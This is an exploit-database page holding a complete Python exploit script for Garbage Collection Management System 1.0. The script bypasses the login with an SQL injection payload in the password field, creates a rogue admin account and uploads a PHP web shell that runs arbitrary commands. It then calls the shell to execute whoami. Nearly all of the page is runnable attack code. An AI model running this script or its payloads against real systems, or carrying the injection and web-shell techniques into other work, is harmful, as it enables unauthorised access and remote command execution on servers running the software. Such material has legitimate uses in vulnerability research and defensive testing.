Exploit for Garbage Collection Management System 1.0 Shell Upload / SQL Injection

Name: Exploit for Garbage Collection Management System 1.0 Shell Upload / SQL Injection
Rating: 5 (320 reviews)
2021-07-13 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:163475
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload  
# Date: 05-07-2021  
# Exploit Author: Luca Bernardi - bernardiluca.job at protonmail.com | luca.bernardi at dedagroup.it  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html  
# POC: https://www.exploit-db.com/exploits/50085  
# Tested On: Ubuntu 21.04 + Apache/2.4.46 (Ubuntu)  
# Version: 1.0  
  
#======================================================  
  
#imports  
from requests_toolbelt.multipart.encoder import MultipartEncoder  
import requests  
import string  
import random  
import os  
import argparse  
  
#generate random string 8 chars  
def randomGen(size=8, chars=string.ascii_lowercase):  
return ''.join(random.choice(chars) for _ in range(size))  
  
  
  
#generating a random username and a random web shell file  
user=randomGen()  
shellFile=randomGen()+".php"  
  
#creating a payload for the login  
payload = {  
"username":"a",  
"password":"a' OR 1=1 AND ucat='admin' #"  
}  
  
  
proxies = {"http":"http://127.0.0.1:8080"}  
  
session=requests.Session()  
  
#changeme  
urlBase="http://172.27.1.71/Gabage/"  
  
url=urlBase+"login.php"  
print("=== executing SQL Injection ===")  
req=session.post(url,payload,allow_redirects=False)  
  
cookie=req.headers["Set-Cookie"]  
print("=== authenticated admin cookie:" + cookie + " ===")  
  
url=urlBase+"apatient/users.php?user=rayat"  
  
mp_encoder = MultipartEncoder(  
fields = {  
"fullname":user,  
"ucat":"admin",  
"contact":"0000000000",  
"address":"aaa ave",  
"username":user,  
"acstatus":"active",  
"date":"2021-07-05",  
"password":user,  
"image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"),  
"submit":""  
}  
)  
  
  
headers = {  
"Cookie":cookie,  
'Content-Type': mp_encoder.content_type  
}  
  
print("=== creating user " + user + " and uploading shell " + shellFile +" ===")  
req=session.post(url,data=mp_encoder,allow_redirects=False,headers=headers) #,proxies=proxies)  
  
#curl the shell for test  
requestUrl = "curl " + urlBase + "apatient/contract/"+shellFile+"?cmd=whoami"  
print("=== issuing a whoami: " + requestUrl + " ===")  
  
print("===CURL OUTPUT===")  
os.system(requestUrl)